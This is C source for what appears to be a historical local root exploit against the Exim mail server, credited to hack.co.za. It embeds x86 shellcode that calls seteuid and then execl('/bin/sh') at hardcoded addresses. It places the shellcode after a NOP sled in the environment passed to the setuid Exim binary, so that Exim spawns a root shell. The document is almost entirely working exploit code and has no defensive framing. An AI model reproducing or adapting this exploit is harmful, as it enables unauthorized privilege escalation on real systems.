/*
 * sample code for one OS/compiler combination; ./this ./exim -bt you
 */
  
char code[] = {
   0x31,0xc0 /* eax = 0 */
 , 0x50 /* push eax */
 , 0xbb,0x98,0x30,0x04,0x00 /* ebx = 0x43098; &seteuid in my copy of exim */
 , 0xff,0xd3 /* call ebx */
 , 0x31,0xc0
 , 0x50
 , 0xb8,0x9a,0xd1,0x03,0x00 /* eax = 0x3d19a; &"/bin/sh" in my copy of exim */
 , 0x50
 , 0x50
 , 0xbb,0xf8,0x29,0x04,0x00 /* ebx = 0x429f8; &execl in my copy of exim */
 , 0xff,0xd3
 , 0x00 /* just to terminate the last string in the environment */ } ;
   
char buf[1000];
char *env[1001];
   
void main(argc,argv)
int argc;
char **argv;
{
  int i;
  int j;
   
  for (i = 0;i < sizeof buf;++i) buf[i] = 0x90; /* nop */
  memcpy(buf + sizeof buf - sizeof code,code,sizeof code);
   
  j = 0;
  env[0] = buf;
  for (i = 0;i < sizeof buf;++i) if (!buf[i]) env[++j] = buf + i + 1;
  env[j] = 0;
   
  if (argv[1]) execve(argv[1],argv + 1,env);
  exit(1);
}
/*                    www.hack.co.za           [12 June]*/